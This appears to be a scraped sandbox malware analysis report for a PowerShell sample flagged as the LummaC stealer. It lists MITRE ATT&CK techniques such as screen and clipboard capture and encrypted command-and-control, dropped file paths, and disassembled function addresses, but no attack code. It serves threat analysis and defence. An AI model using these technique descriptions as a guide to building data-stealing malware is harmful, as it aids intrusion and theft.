Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 87.247.158.212.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp3suq5l.gtp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3ufdayp.g3z.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IC9Y7NM5VEF8QUBZHVZS.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
87.247.158.212.ps1

Function 00007FFD3410F8A9 Relevance: 1.6, APIs: 1, Instructions: 123
threadCOMMON

Function 00007FFD3410D9E8 Relevance: 1.6, APIs: 1, Instructions: 118
threadCOMMON

Function 00007FFD341D1395 Relevance: 1.6, Strings: 1, Instructions: 331
COMMON

Function 0043B7B0 Relevance: 23.6, APIs: 11, Strings: 2, Instructions: 851
memorycomCOMMON

Function 00423E44 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 429
COMMON

Function 00436590 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128
COMMON

Function 00408740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228
threadCOMMON

Function 0040D690 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 329
COMMON

Function 0042DEE5 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 437
COMMON

Function 0042ECD0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370
COMMON

Function 0040CB44 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Function 00410446 Relevance: 2.4, APIs: 1, Instructions: 941
COMMON

Function 00418404 Relevance: 1.7, APIs: 1, Instructions: 200
encryptionCOMMON